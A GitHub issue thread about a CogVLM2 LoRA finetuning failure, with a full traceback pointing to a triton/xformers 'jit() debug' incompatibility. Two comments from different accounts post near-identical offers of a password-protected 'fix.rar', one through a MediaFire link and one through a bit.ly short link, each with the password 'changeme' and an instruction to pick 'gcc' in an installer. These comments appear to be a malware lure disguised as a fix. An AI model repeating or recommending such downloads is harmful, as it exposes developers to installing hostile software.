### ISSUE TITLE
finetune，TypeError: jit() got an unexpected keyword argument 'debug'

### ISSUE THREAD

**Issue by Fu-ffion** [THUDM/CogVLM2#184]
### System Info / 系統信息

阿里云modelscope:1.16.0-pytorch2.3.0tensorflow2.16.1-gpu-py310-cu121-ubuntu22.04，机器：A10，8vCPU，30GB内存，24GB显存

### Who can help? / 谁可以帮助到您？

@zr

### Information / 问题信息

- [ ] The official example scripts / 官方的示例脚本
- [ ] My own modified scripts / 我自己修改的脚本和任务

### Reproduction / 复现过程

1.conda activate test
2.cd到finetune文件夹中，pip install -r requirements.txt
3.deepspeed peft_lora_origin.py --ds_config ds_config_origin.yaml
文件名改了下

更改了部分默认地址如下：
    parser.add_argument("--model_path", type=str,
                        default="/mnt/workspace/cogvlm2-llama3-chat-19B",
                        help="Path to the pretrained model")
    parser.add_argument("--dataset_path", type=str,
                        default="/mnt/workspace/CogVLM-SFT-311K",
                        help="Path to the conversation dataset")
    parser.add_argument("--save_path", type=str, default="/mnt/workspace/finetuned_model",
                        help="Path to save the finetuned model, must be a exit directory")
    parser.add_argument("--ds_config", type=str, default="/mnt/workspace/CogVLM2/finetune_demo/ds_config.yaml",
                        help="DeepSpeed configuration file path")

其中，预训练模型用过int4的，也用过cogvlm2-llama3-chat-19B，都显示同样的问题 TypeError: jit() got an unexpected keyword argument 'debug'

int4报错日志如下：
[2024-08-27 11:06:37,029] [INFO] [real_accelerator.py:203:get_accelerator] Setting ds_accelerator to cuda (auto detect)
 [WARNING]  Please specify the CUTLASS repo directory as environment variable $CUTLASS_PATH
 [WARNING]  sparse_attn requires a torch version >= 1.5 and < 2.0 but detected 2.3
 [WARNING]  using untested triton version (2.0.0), only 1.0.0 is known to be compatible
[2024-08-27 11:06:43,994] [WARNING] [runner.py:202:fetch_hostfile] Unable to find hostfile, will proceed with training with local resources only.
[2024-08-27 11:06:43,995] [INFO] [runner.py:568:main] cmd = /usr/local/bin/python -u -m deepspeed.launcher.launch --world_info=eyJsb2NhbGhvc3QiOiBbMF19 --master_addr=127.0.0.1 --master_port=29500 --enable_each_rank_log=None peft_lora_origin.py --ds_config ds_config_origin.yaml
[2024-08-27 11:06:45,473] [INFO] [real_accelerator.py:203:get_accelerator] Setting ds_accelerator to cuda (auto detect)
 [WARNING]  Please specify the CUTLASS repo directory as environment variable $CUTLASS_PATH
 [WARNING]  sparse_attn requires a torch version >= 1.5 and < 2.0 but detected 2.3
 [WARNING]  using untested triton version (2.0.0), only 1.0.0 is known to be compatible
[2024-08-27 11:06:47,792] [INFO] [launch.py:139:main] 0 NV_LIBNCCL_DEV_PACKAGE=libnccl-dev=2.17.1-1+cuda12.1
[2024-08-27 11:06:47,792] [INFO] [launch.py:139:main] 0 NV_LIBNCCL_DEV_PACKAGE_VERSION=2.17.1-1
[2024-08-27 11:06:47,792] [INFO] [launch.py:139:main] 0 NCCL_VERSION=2.17.1-1
[2024-08-27 11:06:47,792] [INFO] [launch.py:139:main] 0 NV_LIBNCCL_DEV_PACKAGE_NAME=libnccl-dev
[2024-08-27 11:06:47,792] [INFO] [launch.py:139:main] 0 NV_LIBNCCL_PACKAGE=libnccl2=2.17.1-1+cuda12.1
[2024-08-27 11:06:47,792] [INFO] [launch.py:139:main] 0 NV_LIBNCCL_PACKAGE_NAME=libnccl2
[2024-08-27 11:06:47,792] [INFO] [launch.py:139:main] 0 NV_LIBNCCL_PACKAGE_VERSION=2.17.1-1
[2024-08-27 11:06:47,792] [INFO] [launch.py:146:main] WORLD INFO DICT: {'localhost': [0]}
[2024-08-27 11:06:47,792] [INFO] [launch.py:152:main] nnodes=1, num_local_procs=1, node_rank=0
[2024-08-27 11:06:47,792] [INFO] [launch.py:163:main] global_rank_mapping=defaultdict(<class 'list'>, {'localhost': [0]})
[2024-08-27 11:06:47,792] [INFO] [launch.py:164:main] dist_world_size=1
[2024-08-27 11:06:47,792] [INFO] [launch.py:168:main] Setting CUDA_VISIBLE_DEVICES=0
[2024-08-27 11:06:47,792] [INFO] [launch.py:256:main] process 491 spawned with command: ['/usr/local/bin/python', '-u', 'peft_lora_origin.py', '--local_rank=0', '--ds_config', 'ds_config_origin.yaml']
2024-08-27 11:06:51.010804: I tensorflow/core/util/port.cc:113] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
2024-08-27 11:06:51.874522: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 AVX512F AVX512_VNNI FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
2024-08-27 11:06:53.486493: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
[2024-08-27 11:06:58,313] [INFO] [real_accelerator.py:203:get_accelerator] Setting ds_accelerator to cuda (auto detect)
 [WARNING]  Please specify the CUTLASS repo directory as environment variable $CUTLASS_PATH
 [WARNING]  sparse_attn requires a torch version >= 1.5 and < 2.0 but detected 2.3
 [WARNING]  using untested triton version (2.0.0), only 1.0.0 is known to be compatible
[2024-08-27 11:06:58,556] [INFO] [comm.py:637:init_distributed] cdb=None
[2024-08-27 11:06:58,556] [INFO] [comm.py:668:init_distributed] Initializing TorchBackend in DeepSpeed with backend nccl
WARNING:accelerate.utils.other:Detected kernel version 4.19.24, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
Special tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.
[rank0]: Traceback (most recent call last):
[rank0]:   File "/mnt/workspace/CogVLM2/finetune_demo/peft_lora_origin.py", line 351, in <module>
[rank0]:     main()
[rank0]:   File "/mnt/workspace/CogVLM2/finetune_demo/peft_lora_origin.py", line 229, in main
[rank0]:     model = AutoModelForCausalLM.from_pretrained(args.model_path, torch_dtype=args.torch_type, trust_remote_code=True)
[rank0]:   File "/usr/local/lib/python3.10/site-packages/transformers/models/auto/auto_factory.py", line 550, in from_pretrained
[rank0]:     model_class = get_class_from_dynamic_module(
[rank0]:   File "/usr/local/lib/python3.10/site-packages/transformers/dynamic_module_utils.py", line 513, in get_class_from_dynamic_module
[rank0]:     return get_class_in_module(class_name, final_module)
[rank0]:   File "/usr/local/lib/python3.10/site-packages/transformers/dynamic_module_utils.py", line 211, in get_class_in_module
[rank0]:     module_spec.loader.exec_module(module)
[rank0]:   File "<frozen importlib._bootstrap_external>", line 883, in exec_module
[rank0]:   File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
[rank0]:   File "/root/.cache/huggingface/modules/transformers_modules/cogvlm2-llama3-chinese-chat-19B-int4/modeling_cogvlm.py", line 19, in <module>
[rank0]:     from .visual import EVA2CLIPModel
[rank0]:   File "/root/.cache/huggingface/modules/transformers_modules/cogvlm2-llama3-chinese-chat-19B-int4/visual.py", line 4, in <module>
[rank0]:     import xformers.ops as xops
[rank0]:   File "/usr/local/lib/python3.10/site-packages/xformers/ops/__init__.py", line 27, in <module>
[rank0]:     from .modpar_layers import ColumnParallelLinear, RowParallelLinear
[rank0]:   File "/usr/local/lib/python3.10/site-packages/xformers/ops/modpar_layers.py", line 15, in <module>
[rank0]:     from .seqpar import sequence_parallel_leading_matmul, sequence_parallel_trailing_matmul
[rank0]:   File "/usr/local/lib/python3.10/site-packages/xformers/ops/seqpar.py", line 18, in <module>
[rank0]:     from .sequence_parallel_fused_ops import (
[rank0]:   File "/usr/local/lib/python3.10/site-packages/xformers/ops/sequence_parallel_fused_ops.py", line 18, in <module>
[rank0]:     from ._triton.sequence_parallel_fused_kernels import (
[rank0]:   File "/usr/local/lib/python3.10/site-packages/xformers/ops/_triton/sequence_parallel_fused_kernels.py", line 385, in <module>
[rank0]:     @triton.jit(
[rank0]: TypeError: jit() got an unexpected keyword argument 'debug'
[2024-08-27 11:07:01,805] [INFO] [launch.py:319:sigkill_handler] Killing subprocess 491
[2024-08-27 11:07:01,805] [ERROR] [launch.py:325:sigkill_handler] ['/usr/local/bin/python', '-u', 'peft_lora_origin.py', '--local_rank=0', '--ds_config', 'ds_config_origin.yaml'] exits with return code = 1

### Expected behavior / 期待表现

能够完成微调。

想知道这个报错什么原因，我该怎么做。

同时想知道能不能把peft_lora.py里面的”.jpg“改为”.png“，自己生成的训练集生成的png格式的图片

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Fu-ffion** [comment]
更换显存大的机器
